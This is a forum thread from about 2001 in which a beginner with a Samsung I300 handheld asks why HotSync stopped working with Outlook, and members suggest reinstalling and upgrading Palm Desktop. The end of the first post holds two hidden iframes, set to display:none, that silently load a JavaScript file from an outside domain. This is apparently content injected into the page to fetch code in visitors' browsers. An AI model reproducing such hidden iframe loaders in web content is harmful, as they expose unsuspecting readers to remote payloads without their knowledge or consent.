+ Reply to Thread
Results 1 to 6 of 6
  1. #1
    Registered User
    Join Date
    12-23-2001
    Posts
    5

    Unhappy Messed up isntallation-can't hot sync

    Hi! I am a beginner with a new 1300. All was working, including my Hot Sync, until today I got a message while sync’g that said that my Outlook was not connecting, or something to that effect. The message told me to go to Outlook and delete the PocketMirror and then re-sync. I found the mirror, deleted it and all its connections, and re-synced. You guessed it! Nothing happened. Now I don’t know what to do? Please advise….slowly. Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Beams from above...
    Join Date
    12-24-2001
    Location
    Atlanta
    Posts
    26
    I haven't seen this patricular problem before, but if it was me, I would remove the Hotsync program and Palm Desktop (either through the Start menu or Add/Remove Programs in the Control Panel) and reinstall everything again from scratch.

    Your data is safe, so you can be confident in starting over with a clean install of the Palm software.

    Let me know if you need more detailed instructions...

    John

  3. #3
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048

    Arrow

    also, go to palm.com and get the updated palm DESKTOP software 4.0.1.. its waay better than 3.x and it will back up your user installed apps and such...
    Last edited by Marctronixx; 12-28-2001 at 05:24 PM.

  4. #4
    Old School mjorange's Avatar
    Join Date
    11-07-2001
    Location
    San Rafael
    Posts
    2,254
    Hey, nobody told me my mother was here! Now I can't have fun anymore. :o

    Yeah, sounds like you should uninstall and then reinstall. I don't know why you were told to delete Pocket Mirror.

  5. #5
    Registered User
    Join Date
    12-23-2001
    Posts
    5

    Question Messed up isntallation-can't hot sync

    Thanks forthe responses to my quest. I went to Palm.com as suggested and they have Desktop for 500 series, 100 series or all other. If I have the 1300, which series do I have? Sorry to be so confused, but I was honest about my techie aptitude in the beginning. Remember? Thanks again. Please advise.

  6. #6
    Beams from above...
    Join Date
    12-24-2001
    Location
    Atlanta
    Posts
    26
    Well...

    I can't say for certain, but if it was me, I would get the one offered for the M505; it seems that this is the Palm that is most compatible with the Samsung.

    Worst case scenario, you could always Uninstall and go back to the original version included in the box with your I300.

    I wonder if the Samsung website offers a 4.01 upgrade? My I300 shipped with 4.01.

    John

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts